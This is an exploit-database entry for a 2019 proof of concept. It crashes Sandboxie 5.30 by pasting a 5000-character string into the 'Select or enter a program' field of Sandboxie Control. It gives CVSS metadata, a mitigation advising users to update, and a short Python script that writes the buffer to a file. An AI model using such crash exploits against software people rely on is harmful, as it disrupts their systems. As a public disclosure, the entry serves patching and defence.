Sandboxie 5.30 - Denial of Service (PoC)

vendor:

Sandboxie

by:

Alejandra Sánchez

7.5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: Sandboxie

Affected Version From: 5.30

Affected Version To: 5.30

Patch Exists: YES

Related CWE: N/A

CPE: a:sandboxie:sandboxie

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 10

2019

Sandboxie 5.30 – Denial of Service (PoC)

This exploit is a proof of concept for a denial of service vulnerability in Sandboxie 5.30. The exploit creates a file containing 5000 'A' characters, which when pasted into the 'Select or enter a program' field of the 'Configure > Programs Alerts' menu of Sandboxie Control, causes the application to crash.

Mitigation:

Users should update to the latest version of Sandboxie, which is not vulnerable to this exploit.

Source

Exploit-DB raw data:

# -*- coding: utf-8 -*-
# Exploit Title: Sandboxie 5.30 - Denial of Service (PoC)
# Date: 16/05/2019
# Author: Alejandra Sánchez
# Vendor Homepage: https://www.sandboxie.com
# Software https://www.sandboxie.com/SandboxieInstall.exe
# Version: 5.30
# Tested on: Windows 10

# Proof of Concept:
# 1.- Run the python script 'Sandboxie.py', it will create a new file 'Sandboxie.txt'
# 2.- Copy the text from the generated Sandboxie.txt file to clipboard
# 3.- Open Sandboxie Control
# 4.- Go to 'Configure' > 'Programs Alerts'
# 5.- Click 'Add Program', paste clipboard in the field 'Select or enter a program' and click 'OK'
# 6.- Click 'OK' and crashed

buffer = "\x41" * 5000

f = open ("Sandboxie.txt", "w")
f.write(buffer)
f.close()